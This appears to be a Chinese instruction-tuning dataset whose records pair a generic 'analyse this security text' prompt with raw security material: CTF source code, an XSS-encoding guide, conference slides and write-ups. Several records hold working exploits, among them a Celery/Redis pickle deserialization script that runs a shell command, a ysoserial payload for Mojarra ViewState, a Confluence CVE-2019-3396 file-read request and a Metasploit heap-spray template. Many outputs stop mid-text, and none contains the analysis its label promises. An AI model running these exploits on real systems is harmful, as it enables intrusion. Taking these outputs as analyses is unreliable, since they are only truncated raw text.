{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nrequire 'erb' require 'webrick' require 'fileutils' require 'securerandom' include WEBrick::HTTPStatus FileUtils.rm_rf('/tmp/flags') FileUtils.mkdir_p('/tmp/flags') FileUtils.cp('flag.txt', \"/tmp/flags/#{SecureRandom.alphanumeric(32)}.txt\") FileUtils.rm('flag.txt') server = WEBrick::HTTPServer.new Port: 9292 def is_bad_path(path) bad_char = nil %w(* ? [ { \\\\).each do |char| if path.include? char bad_char = char break end end if bad_char.nil? false else # check if brackets are paired if bad_char == ?{ path[path.index(bad_char)..].include? ?} elsif bad_char == ?[ path[path.index(bad_char)..].include? ?] else true end end end server.mount_proc '/' do |req, res| raise BadRequest if is_bad_path(req.path) if req.path.end_with? '/' if req.path.include? '.' raise BadRequest end path = \".#{req.path}*\" files = Dir.glob(path) res['Content-Type'] = 'text/html' res.body = ERB.new(File.read('index.html.erb')).result(binding) next end payload=req.path[1..] matches = Dir.glob(payload) if matches.empty? raise NotFound end begin file = File.open(matches.first, 'rb') res['Content-Type'] = server.config[:MimeTypes][File.extname(req.path)[1..]] res.body = file.read rescue Errno::EISDIR => e res.set_redirect(MovedPermanently, req.path + '/') end end trap 'INT' do server.shutdown end server.start", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n<?php session_start(); function get_question(){ $answer = array(); foreach(file(\"xxxxxxxxx\") as $line) { array_push($answer, trim($line)); } $random_index = rand(0, 999); $question = file_get_contents(\"xxxxxxxx/$random_index\"); $_SESSION['quesans'] = $answer[$random_index]; return $question; } function bad_hacking_penalty(){ $_SESSION['count'] = 0; } function handle_invalid_captcha_ans(){ $_SESSION['count'] = 0; } function is_clean($input){ if (preg_match(\"/SESSION/i\", $input)){//no seesion variable alteration bad_hacking_penalty(); return false; } if (preg_match('/(base64_|eval|system|shell_|exec|php_)/i', $input)){//no coomand injection bad_hacking_penalty(); return false; } if (preg_match('/(file|echo|die|print)/i', $input)){//no file access bad_hacking_penalty(); return false; } if (preg_match(\"/(or|\\|)/\", $input)){//Be brave use AND bad_hacking_penalty(); return false; } if (preg_match('/(flag)/i', $input)){//don't take shortcuts bad_hacking_penalty(); return false; } //clean input return true; } function random_string(){ $captcha_file = \"xxxxxxxx\"; $random_index = rand(0, 999); $i = 1; foreach(file($captcha_file) as $line) { if ($i == $random_index) return $line; $i++; } } //current captcha to be verified against user input $cur_captcha = $_SESSION['captcha']; //set captcha for next try $next_captcha = rtrim(random_string()); $_SESSION['captcha'] = $next_captcha; $captcha_url = \"xxxxxxxxx\" . md5('xxxxxxxxxxxx' . $next_captcha); $invalid_ans = 0; $invalid_captcha = 0; if (isset($_SESSION['count']) && isset($_POST['captcha']) && $_POST['captcha'] != ''){ $user_captcha = $_POST['captcha']; if($cur_captcha === $user_captcha){ $user_ans = $_POST['answer']; $real_ans = $_SESSION['quesans']; if (is_clean($user_ans)){ (assert(\"'$real_ans' === '$user_ans'\") and $_SESSION['count'] +=1) or (handle_invalid_captcha_ans() or $invalid_ans = 1); }else{ die('Detected hacking attempt'); } }else{ handle_invalid_captcha_ans(); $invalid_captcha = 1; } }else{ handle_invalid_captcha", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nApp 4 1CSRF CSRF 2 3Cookie Cookie CookieXssCookieHttpOnlyXss /Xss Cookie Xss CookieHttpOnly HtmlJslogin location.href location.href AppWebViewUrl AppWebViewDeepLinkAppWebView Url Url AppJsBridgeWebViewNative WebViewUrlNative WebViewNativecall WebView AppApp callHook call invokeNative()NativeenablePageJsBridge() Native UrlNative app://open/?url=http://www.baidu.com window.jsBridge.send('{\"call\": \"test\"}') WebViewUrl WebViewhttp://test.com/://aaa.asdqwe.com 404payload Naitve NativeHttp urlHttp CookieCookie CookieHttpOnlyXss AndroidiOSApp 1DeepLinkAppWebView 2Url://aaa.asdqwe.com Native 3http Cookie (|:\\/\\/)((((\\w|-|\\.)+\\.)(asdqwe\\.(cn|com))))($|[\\/\\?#]\\w*) (|:\\/\\/) ://aaa.asdqwe.com window.jsBridge.send('{\"call\": \"http\", \"data\": {\"url\": \"xxx\", \"headers\": {\"xxx\": \"xxx\"}}}')", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nYOURE DOING IOT RNG  Random numbers are very important to security  Encryption keys  Authentication tokens  Business logic  Computers are notoriously bad at making random numbers  They inherently only do deterministic functions  Hardware RNG  Makes entropy  Solves the problem right? RANDOM NUMBERS DOING RNG 2 Input Computer Magic Output  PRNG (Pseudo RNG)  Cryptographically Secure  Regular RANDOM NUMBERS DOING RNG 3  True RNG (TRNG)  Terrible name  Hardware RNG  Black boxes  Very little information  Except the STM32, great info!  Two common implementations:  Analog circuit  Clock timings  Issues that come up  Running too fast  Accidental syncing HARDWARE RNG DESIGN DOING RNG 4 Analog Circuit Method Output Clock A Clock B Clock Timings Method Measured Delta Normal Distribution  Most new IoT SoCs have a hardware RNG as of 2021  An entire hardware peripheral devoted to doing just this one thing  Surely it must be super secure  No operating systems  IoT devices run C/C++ on bare metal  Call it like this:  u8 hal_get_random_number(u32 *out_number);  Two parts we care about here:  Output variable (our random number)  Return code HOW IOT DOES RNG DOING IOT RNG 5 FREERTOS MEDIATEK 7697 NOBODY 6 CHECKS ERROR CODES (Two Examples)  What happens when the RNG call fails? WHATS THE WORST THAT COULD HAPPEN? PETROS LAW FORESHADOWING 7 Undefined Behavior  Typically one of:  Partial entropy  The number 0 WHATS THE WORST THAT COULD HAPPEN? FORESHADOWING 8 u8 hal_get_random_number(u32 *out_number); Call #1 Call #2 Call #3 Call #4 https://imgs.xkcd.com/comics/random_number.png IT CAN ALWAYS BE WORSE PETROS LAW:  Uninitialized memory WHATS THE WORST THAT COULD HAPPEN? ITS WORSE 10 u32 random_number; hal_get_random_number(&random_number); // Sends over the network packet_send(random_number); Arbitrary bytes from RAM!  RSA Certificate Vulnerability Factoring RSA Keys in the IoT Era  https://www.keyfactor.com/resources/factoring-rsa-keys-in-the-iot-era/ 435,000 weak certificates  1 in 172 o", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport pickle import json import base64 import redis import sys r = redis.Redis(host=sys.argv[1], port=6379, decode_responses=True,db=0) ori_str=\"{\\\"content-type\\\": \\\"application/x-python-serialize\\\", \\\"properties\\\": {\\\"delivery_tag\\\": \\\"16f3f59d-003c-4ef4-b1ea-6fa92dee529a\\\", \\\"reply_to\\\": \\\"9edb8565-0b59-3389-944e-a0139180a048\\\", \\\"delivery_mode\\\": 2, \\\"body_encoding\\\": \\\"base64\\\", \\\"delivery_info\\\": {\\\"routing_key\\\": \\\"celery\\\", \\\"priority\\\": 0, \\\"exchange\\\": \\\"celery\\\"}, \\\"correlation_id\\\": \\\"6e046b48-bca4-49a0-bfa7-a92847216999\\\"}, \\\"headers\\\": {}, \\\"content-encoding\\\": \\\"binary\\\", \\\"body\\\": \\\"gAJ9cQAoWAMAAABldGFxAU5YBQAAAGNob3JkcQJOWAQAAABhcmdzcQNLZEvIhnEEWAMAAAB1dGNxBYhYBAAAAHRhc2txBlgJAAAAdGFza3MuYWRkcQdYAgAAAGlkcQhYJAAAADZlMDQ2YjQ4LWJjYTQtNDlhMC1iZmE3LWE5Mjg0NzIxNjk5OXEJWAgAAABlcnJiYWNrc3EKTlgJAAAAdGltZWxpbWl0cQtOToZxDFgGAAAAa3dhcmdzcQ19cQ5YBwAAAHRhc2tzZXRxD05YBwAAAHJldHJpZXNxEEsAWAkAAABjYWxsYmFja3NxEU5YBwAAAGV4cGlyZXNxEk51Lg==\\\"}\" task_dict = json.loads(ori_str) command = 'touch /tmp/celery_success' class Person(object): def __reduce__(self): # 未导入os模块通用 return (__import__('os').system, (command,)) pickleData = pickle.dumps(Person()) task_dict['body']=base64.b64encode(pickleData).decode() print(task_dict) r.lpush('celery',json.dumps(task_dict))", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 1 跨站脚本XSS ### 1.1反射xss #### 1.1.1 输出在html 标签内或者普通属性非href非事件类 调用如下的HtmlEncode 函数进行编码php 示例代码其他语言可以参照实现 ``` php function HtmlEncode($str) { $str = str_replace(\"&\",\"&amp;\", $str); $str = str_replace(\">\",\"&gt;\", $str); $str = str_replace(\"<\",\"&lt;\", $str); $str = str_replace(\"\\\"\",\"&quot;\", $str); $str = str_replace(\"'\",\"&#39;\", $str); $str = preg_replace(\"/\\s+/\",\"&#32;\", $str); return $str; } ``` 注为了预防业务将参数输出至属性值时未使用引号包裹的情况这里自己实现的HtmlEncode 也将空格编码 #### 1.1.2 输出在html 标签的 href 属性内 一般来说如果变量是完整的url应该先检查下是否以http开头且目的域名是允许的域名列表内以保证不会出现伪协议类的XSS攻击接着使用 HtmlEncode编码下或者因为此处是地址栏可以用 php标准函数urlencode 编码变量 #### 1.1.3 输出在html 标签的事件属性内如onXX 事件 使用 jsencode(\\uUUUU) 编码php 示例代码其他语言可以参照实现 ``` php function jsencode($str) { $arr = array(); $str_len = strlen($str); $need_encode = \"<>\\\"&#`()[]';\"; for($i = 0; $i < $str_len; $i++) { if (strpos($need_encode, $str[$i])) { $arr[$i] = \"\\\\u00\" . bin2hex($str[$i]); } else { $arr[$i] = $str[$i]; } } return join(\"\", $arr); } ``` #### 1.1.4 在富文本框内进行过滤 参考 [这里](https://gist.github.com/JnuSimba/33743009db744a47579002e8e042e2fb) 进行标签和属性的白名单过滤 ### 1.2 存储XSS 同反射XSS在输出变量时参照如上情形描述 ### 1.3 DOMXSS 在\"$var\" 输出到`<script>` 时应该执行一次 jsencode(\\uUUUU)其次在document.write 输出到页面 html 页面时要分具体情况对待如果是输出到事件或者脚本则要再做一次 jsEncode如果是输出到 html 内容或者属性则要再做一次 HtmlEncode 如下情况属于后者即 HtmlEncode (jsencode($var)) ``` html <script> var x = \"$var\"; document.write(\"<a href='\"+x+\"' >test</a>\"); </script> ``` Javascript 函数代码示例如下 ``` javascript function jsencode(str) { var arr = []; var need_encode = \"<>\\\"&#`()[]';\"; for (var i = 0; i < str.length; i++) { if (need_encode.indexOf(str[i]) != -1) { arr[i] = (\"\\\\u00\" + str.charCodeAt(i).toString(16)).slice(-6); } else { arr[i] = str[i]; } } return arr.join(\"\"); } function HtmlEncode(sStr) { sStr = sStr.replace(/&/g,\"&amp;\"); sStr = sStr.replace(/>/g,\"&gt;\"); sStr = sStr.replace(/</g,\"&lt;\"); sStr = sStr.replace(/\"/g,\"&quot;\"); sStr = sStr.replace(/'/g,\"&#39;\"); sStr = sStr.replace(/\\s+/g,\"&#32;\"); return sStr; } ``` 在使用location.href / location.replace() ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Mojarra JSF ViewState Deserialization Vulnerability [中文版本(Chinese version)](README.zh-cn.md) JavaServer Faces (JSF) is a standard for building Web applications, and Mojarra is a framework that implements JSF. The Mojarra that before 2.1.29-08 and 2.0.11-04, is not configured to encrypt the ViewState, so the web application may have a serious remote code execution (RCE) vulnerability. Reference links: - https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html - https://www.exploit-db.com/docs/48126 - https://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf ## Setup Execute the following command to start a JSF application which using JDK7u21 and Mojarra 2.1.28: ``` docker compose up -d ``` After the application is started, visit `http://your-ip:8080` to see the demo page. ## Exploit Here is the structure of ViewState that encoding without a security layer: ![](1.png) According to this structure, we can use [ysoserial's Jdk7u21 Gadget](https://github.com/frohoff/ysoserial) to generate a payload: ``` $ java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 \"touch /tmp/success\" | gzip | base64 -w 0 H4sIAAVGF18AA61WzW8bRRR/Yye2Y9zmo/lsaZvQlnxAd/PlJsURbT5Ia3BIhNNUwocwXk/sbde7293ZZINEb/wBCJX/AJBoOPRCqx6QKm4tFyQkUFEluHADDhUSFz7e7G5iKwnYLV1pd2bf17z35jdv3tYv0Ghb0HWFrlPJ4aomZVT9KitcpHYpy/j32ndv33g0dCwE4FrQWpEK+Hfn3r/x0Z3b42HkmxsJAGg5dx7EE0KrryhGWbIdXTKsokRNqpSY5FKN6pKqc2bpVJNcW+OKxC3qSsusbGqUMzuNY9PlxXv61s2xMETScGBV1QtM52865Tyz0nBwFRV0W2M8jXQ3B/HV/CZnilFgNodwLjeTg8iqolEbf9tyGeG2jMsW5VlBS2WgcVWnZYbMKl6WW6peRGbrquFw0+FLlmEyi6vCaKcvKGKXK/SUa4pY/8bHsbyF3/izp6NY/GFCJEzwQkgP5Wa2Hnf9EYkt/xiQI5/d/+vul8gehbNxCMMLUZiIwqkovEigxWaWSrUVZtmqoV9KzxEgrxM4MGvoNqc6X6Gawxo/7/3w8QePfnuVQGRK1VWOk/DA4AqBhlnMAoFm3Ebm52uZ5jWktGUMBc1SNI7/AbGBl1SbwKEsd/LLQU6X6KZm0AKBRFrXmeWljKFQMrNpG75zsunL2H5CLtBCkXH75D5WUgSavM1aM6wyAWsgg5iQERMyYkL2MSF7mJC3MSF7mJDnFhdSuX2ly1pF1vdHfZdZcjaYUo55u0j1gsaslEhJrGAoThnxQ+D0Ey2PqiXfDoY/8/+dIRB/zVWYKWh2FPoJfPJk", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2013 Trend Micro 25th Anniversary --Fuzzing with context enlightenment and exploit OSX IOKit vulnerabilities for fun and profit (P)FACE into the Apple core and exploit to root 2013 Trend Micro 25th Anniversary Agenda  Who we are  Passive fuzzing framework  Context enlightenment  Exploit to root 2013 Trend Micro 25th Anniversary Who are we  Jack Tang:  10 years of anti-malware solution development  Familiar with Windows/Mac kernel technology, browser and document exploit.  Current focusing on research about Mac vulnerability and exploit  Moony Li:  7 years of security production development  RD Leader of Sandcastle core engine of DD(Deep Discovery) production for Gateway 0day exploit detection.  Current focusing on research about Mac/Windows kernel vulnerability and exploit 2013 Trend Micro 25th Anniversary And so what?  Here below is the CVE and ZDI list until now(NOT including submitted but pending):  CVE-2015-3787, CVE-2015-5867, CVE-2015-7021,CVE-2015-7020, CVE-2016-1716,ZDI-CAN-3536,ZDI-CAN-3558, ZDI-CAN-3598,ZDI- CAN-3596,ZDI-CAN-3603,CVE-2015-7067, CVE-2015-7076,CVE- 2015-7106,CVE-2015-7109,CVE-2016-1718,CVE-2016-1747,CVE- 2016-1749,CVE-2016-1753, ZDI-CAN-3693, ZDI-CAN-3694, CVE- 2016-1795, CVE-2016-1808, CVE-2016-1810, CVE-2016-1817, CVE-2016-1820, CVE-2016-1798, CVE-2016-1799, CVE-2016-1812, CVE-2016-1814, CVE-2016-1818, CVE-2016-1816 2013 Trend Micro 25th Anniversary Phase x: Fuzzing framework 2013 Trend Micro 25th Anniversary Agenda  Passive fuzzing framework  Previous work  Approach & consideration  Implementation  Best Practice 2013 Trend Micro 25th Anniversary Previous work 1/2  Traditional fuzzing by IOKit interface Usually open the IOKit service name which they want to test, and pour fuzzing data into by the IOKit usermode API (e.g. IOConnectCallMethod) Call sequence dependency  AppleCamIn (OpenDevice, PowerOnCamera) Input data dependency  AppleHDAEngineInput(input as user mode buffer pointer) Timing dependency  IOHDIXHDDriveOutKernel( mount dmg) 2013", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndwangoAC TASBot the perfectionist The amazing life & achievements of... Twitch.tv/dwangoAC twitter @MrTASBot Allan 'dwangoAC' Cecil http://acbit.net Presented and written by... Allan 'dwangoAC' Cecil President of the North Bay Linux Users Group http://nblug.org http://acbit.net Presented and written by... Allan 'dwangoAC' Cecil President of the North Bay Linux Users Group Senior Engineer at Cyan Ciena http://nblug.org http://www.ciena.com/ http://acbit.net Presented and written by... Allan 'dwangoAC' Cecil President of the North Bay Linux Users Group Senior Engineer at Cyan Ciena http://nblug.org http://www.ciena.com/ http://tasvideos.org/DwangoAC.html http://tasbot.net http://acbit.net Presented and written by... Speedrunning Human limits Playing games fast http://speeddemosarchive.com/ Playing games fast http://speeddemosarchive.com/  Inspiration: in-game completion timers  SpeedDemosArchive.com and others track fastest completion times  Strict rules + peer review: no cheats, no macros  Typically highly entertaining  Many categories, ranging from \"any%\" to \"low% no major glitches\" Playing games fast http://speeddemosarchive.com/  Inspiration: in-game completion timers Games Done Quick Games Done Quick Speedrunning marathons for charity streamed live on Twitch Classic GDQ (2010), Awesome GDQ (2011-), Summer GDQ (2011-) Abusing games https://youtu.be/kIIzE_H7D2g?t=5m27s AGDQ 2014 Abusing games https://youtu.be/kIIzE_H7D2g?t=5m27s AGDQ 2014 Metroid 15:43 World Record https://www.youtube.com/watch?v=67kQ3l-1qMs https://www.youtube.com/watch?v=JXtUwIW7cL8 Momodora by Halfcoordinated - SGDQ 2016 Punch-Out blindfolded by Sinister1 - AGDQ 2014 https://www.youtube.com/watch?v=CvzIb53Lcno https://www.youtube.com/watch?v=JXtUwIW7cL8 Momodora by Halfcoordinated - SGDQ 2016 Even 1-handed, blindfolded... Beyond standard limits! Punch-Out blindfolded by Sinister1 - AGDQ 2014 https://www.youtube.com/watch?v=CvzIb53Lcno https://www.youtube.com/watch?v=JXtUwIW7cL8 Momodora by Halfc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport os import subprocess def test_dockerfile_lint(): basedir = os.path.realpath(os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '..')) dockerfiles = [] for (now_dir, dirs, files) in os.walk(basedir): for name in files: if name in ('oracle-java', ): continue if name == 'Dockerfile': dockerfiles.append(os.path.join(now_dir, name)) config = os.path.join(basedir, 'tests', 'hadolint.yaml') subprocess.run(['hadolint', '--config', config, '--failure-threshold', 'error'] + dockerfiles, check=True)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Postbook - FLAG1 ## 0x00 View Post http://127.0.0.1/1234567890/index.php?page=view.php&id=1 ![](./imgs/post.jpg) ## 0x01 FLAG The id seems can be change. http://127.0.0.1/1234567890/index.php?page=view.php&id=2 ![](./imgs/flag.jpg)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUsing Guided Missiles in Drivebys Automatic browser fingerprinting and exploitation with the Metasploit Framework: Browser Autopwn James Lee 2 Browser Autopwn  Auxiliary module for the Metasploit Framework  Fingerprints a client  Determines what exploits might work  Used to suck  Now it doesn't 3 Outline  Intro  Cluster bombs  Guided missiles  Fingerprinting and targeting  Stealth  Demos  Commercial comparison 4 # whoami  James Lee  egypt  CoFounder, Teardrop Security  Developer, Metasploit Project 5 My Involvement in MSF  Started submitting patches and bug reports in 2007  HD gave me commit access in April 2008  Broke the repo April 2008 6 The Metasploit Framework  Created by HD Moore in 2003  ncurses based game  Later became a real exploit framework in perl  Rewritten in ruby in 2005  Which is way better than python  Extensible framework for writing exploits 7 I <3 MSF  Modular payloads and encoders  Many protocols already implemented  Many nonexploit tools  All kinds of exploits  Traditional serverside  Clientsides 8 Why Clientsides  Karmetasploit  Any other tool that gets you in the middle  Users are weakest link, blah, blah, blah  See Chris Gates 9 Client Exploits in MSF  Extensive HTTP support  Heapspray in two lines of code  Sotirov's .NET DLL, heap feng shui  Wide range of protocollevel IDS evasion  Simple exploit in ~10 lines of code 10 Simple Exploit content = <html><body> <object id='obj' classid='...'></object><script> #{js_heap_spray} sprayHeap(#{payload.encoded}, #{target.ret}, 0x4000); obj.VulnMethod(#{[target.ret].pack(V)*1000}); </script></body></html> send_response(client, content) 11 Or Arbitrarily Complex  ani_loadimage_chunksize is 581 lines of code  As of June 28, MSF has 85 browser exploit modules Problem Solution 14 Cluster Bomb Approach  Is it IE? Send all the IE sploits  Is it FF? Send all the FF sploits  Originally exploits were adhoc  Pain in the ass when new sploits come out Problem Solution 17 Guided Missile Approach  Better client and ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n[Rabit2013@CloverSec]:~# whoami ID Rabit2013Real name 朱利军 [Rabit2013@CloverSec]:~# groupinfo Job : CloverSec Co.,Ltd CSO & CloverSec Labs & Sec Lover [Rabit2013@CloverSec]:~# cat Persional_Info.txt  西电研究生毕业信息对抗网络安全专业  历届XDCTF组织与参与者  多届SSCTF网络攻防比赛组织与出题  某国企行业网络渗透评估  嵌入式漏洞挖掘挑战赛5个高危漏洞  通用Web应用系统漏洞挖掘若干  某国企单位安全培训  . About Me About Team CloverSec Labs Binary Java/Flash 安全防御软件 主流浏览器 操作系统 其他 Web 主流中间件 主流Web应用 其他 主流Web框架 Mobile Terminal Android iOS Windows Phone Tablet IoT/Industry/Car 其他 工控系统 车联网 嵌入式 Wear Devices u 发现多个Microsoft Windows内核提权漏洞 (CVE-2016-0095) u 发现多个Adobe Flash Player任意代码执行漏洞 (CVE-2015-7633 CVE-2015-8418 CVE-2016-1012 CVE-2016-4121) u 发现多个Oracle Java任意代码执行漏洞 (CVE-2016-3422CVE-2016-3443) u 发现多个360安全卫士内核提权漏洞QTA-2016-028 u 发现多个百度杀毒内核提权漏洞 u 率先发现苹果AirPlay协议认证漏洞 u 参加互联网嵌入式漏洞挖掘比赛对某知名厂商提供的设备进行漏洞 挖掘提交了5个高危漏洞 u 为TSRCAFSRC提交漏洞若干 About Team Hacking无处不在 Why? ---为何到处能Hacking Where? ---Hacking的入口点在哪 What? ---哪些能Hacking How? ---怎么去Hacking [ Rabit2013@KCon ] 为何到处能Hacking Why [ Rabit2013@KCon ] Web应用 各类CMS 各类OA 运维系统 内网管理 监控系统 云办公 云WAF 智能手表 摄像头 联网汽车 智能家居 无线路由 防御软件 工业系统 [ Rabit2013@KCon ] 漏洞 [ Rabit2013@KCon ] SQL 注入  XSS 攻击 文件 上传 命令 执行 代码 注入 信息 泄露 框架 注入 越权 访问 弱配置 弱口令 文件 下载 XXE 注入 CSRF SSRF 传统漏洞 [ Rabit2013@KCon ] 新型漏洞 验证码  口令 爆破 撞库 业务 流程 身份 认证 API 接口 找回 密码 业务 授权 认证 时效 业务 一致 业务 篡改 输入 合法 弱加密 [ Rabit2013@KCon ] Hacking无处不在 Why? ---为何到处能Hacking Where? ---Hacking的入口点在哪 What? ---哪些能Hacking How? ---怎么去Hacking [ Rabit2013@KCon ] Hacking的入口点在哪 Where [ Rabit2013@KCon ] 系统本身 + 数据传输 System = 安全与否 Testing Fuzzing Checking [ Rabit2013@KCon ] [ Rabit2013@KCon ] 得到的原始信号长这样 这里有个小诀窍在抓取的时候建议 偏离中心信号一点比如432.7MHz 可以避开信号尖峰影响 现在有这么一个设备通过遥 控器进行控制遥控器使用 433MHz如何知道遥控器发送了 什么 [ Rabit2013@KCon ] [ Rabit2013@KCon ]  了解功能使用范围使用方法以及能做什么  拆机看PCB从各种组件上了解其架构寻找调试接口UART/TTL/JTAG  加电进行常规性检测扫端口看服务等  截取信号进行分析看它发送了什么这些信号都是做什么的  弄到固件拆包分析对其中的关键程序进行逆向  重点关注Ping/Telnet等功能尝试命令执行进入白盒阶段  自制添加了后门的固件尝试刷入进入白盒阶段  其他脑洞大开的想法做法 [ Rabit2013@KCon ]  以高权限登入设备对自己的一些想法进行验证  对外通信内容进行分析构造Payload跑一下  连接调试接口看终端打印信息  利用QEMU进行动态调试下断试错等  从终端到云端", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hatter Category: Reversing, 500 Points ## Description > Hello agent! > > According to our intelligence, the organizations engineers are celebrating their evil inventions by having a party in which everyone is wearing the same crazy hat. > > We must send agent to the party to find out what theyre up to. The only way for you to get in is by wearing the same hat as them. Our intelligence has located the store on which the organization bought the hats from, but the store was empty and contained a note: > > \"Hello fellas, this is the hatter! Im attending a special event and will be back in a few days. If you wish to talk to me, you can find me at well.. check out this file\". > > Note: The flag does not adhere to the usual format. > A binary file was attached. ## Solution Let's run the attached binary: ```console root@kali:/media/sf_CTFs/matrix/Hatter# ./hatter find_thE_hAttEr ``` Indeed, we will. Maybe `ltrace` might give us a hint as to what the program is doing under the hood: ```console root@kali:/media/sf_CTFs/matrix/Hatter# ltrace ./hatter getenv(\"DEBUG\") = nil getenv(\"WHERE_IS_THE_HATTER\") = nil getenv(\"SHOW_PASSWORD\") = nil getenv(\"DUMP_DEBUG_DATA\") = nil putchar(102, 0x511373df0155593f, 7, 0) = 102 putchar(105, 0x511373df0155593f, 6, 1) = 105 putchar(110, 0x511373dc02010f01, 2, 2) = 110 putchar(100, 0x511373de00012841, 0, 3) = 100 putchar(95, 0x511373da046d0142, 1, 4) = 95 putchar(116, 0x511373de00012841, 6, 5) = 116 putchar(104, 0x511373dc02010f01, 0, 6) = 104 putchar(69, 0x511373db050b7a72, 4, 7) = 69 putchar(95, 0x511373da046d0142, 1, 8) = 95 putchar(104, 0x511373dc02010f01, 0, 9) = 104 putchar(65, 0x511373de00012841, 5, 10) = 65 putchar(116, 0x511373de00012841, 6, 11) = 116 putchar(116, 0x511373de00012841, 6, 12) = 116 putchar(69, 0x511373db050b7a72, 4, 13) = 69 putchar(114, 0x511373df0155593f, 5, 14) = 114 putchar(10, 255, 255, 15find_thE_hAttEr ) = 10 +++ exited (status 0) +++ ``` We see that the program queries some environment variables, then prints the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Atlassian Confluence 路径穿越与命令执行漏洞CVE-2019-3396 Atlassian Confluence是企业广泛使用的wiki系统其6.14.2版本前存在一处未授权的目录穿越漏洞通过该漏洞攻击者可以读取任意文件或利用Velocity模板注入执行任意命令 参考资料 - https://paper.seebug.org/884/ - https://jira.atlassian.com/browse/CONFSERVER-57974 ## 环境搭建 执行如下命令启动一个Confluence Server 6.10.2 ``` docker compose up -d ``` 环境启动后访问`http://your-ip:8090`会进入安装引导选择Trial installation之后会要求填写license key点击Get an evaluation license去Atlassian官方申请一个Confluence Server的测试证书 ![](1.png) 然后点击Next安装即可这一步小内存VPS可能安装失败或时间较长建议使用4G内存以上的机器进行安装与测试请耐心等待 如果提示填写cluster node路径填写`/home/confluence`即可 ![](4.png) 后续可能要求你填写数据库账号密码选择postgres数据库地址为`db`账号密码均为`postgres` ![](5.png) ## 漏洞复现 发送如下数据包即可读取文件`web.xml` ``` POST /rest/tinymce/1/macro/preview HTTP/1.1 Host: localhost:8090 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23& Content-Type: application/json; charset=utf-8 Content-Length: 176 {\"contentId\":\"786458\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc6\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}} ``` ![](6.png) 6.12以前的Confluence没有限制文件读取的协议和路径我们可以使用`file:///etc/passwd`来读取文件也可以通过`https://...`来加载远程文件 该文件是一个Velocity模板我们可以通过模板注入SSTI来执行任意命令 ![](7.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# HACKME: 2 > https://download.vulnhub.com/hackme/hackme2-DHCP.ova 靶场IP`192.168.32.209` 扫描对外端口服务 ``` (rootkali)-[/tmp] # nmap -p 1-65535 -sV 192.168.32.209 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 03:10 EDT Nmap scan report for 192.168.32.209 Host is up (0.00042s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.34 ((Ubuntu)) MAC Address: 00:0C:29:22:CA:D2 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 9.04 seconds ``` 访问80端口 ![image-20220907151222221](../../.gitbook/assets/image-20220907151222221.png) 注册测试用户 ![image-20220907151329775](../../.gitbook/assets/image-20220907151329775.png) 输入框有SQL注入漏洞 ![image-20220907151454563](../../.gitbook/assets/image-20220907151454563.png) ``` POST /welcome.php HTTP/1.1 Host: 192.168.32.209 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.32.209/welcome.php Content-Type: application/x-www-form-urlencoded Content-Length: 8 Origin: http://192.168.32.209 Connection: close Cookie: PHPSESSID=d82p89ea990dqrg60r28uao5al Upgrade-Insecure-Requests: 1 Pragma: no-cache Cache-Control: no-cache search=1 ``` 使用sqlmap进行注入找到`superadmin/Uncrackable` ``` (rootkali)-[/tmp] # sqlmap -r 1.txt --level 5 --risk 3 --dbms=mysql -p search --tamper 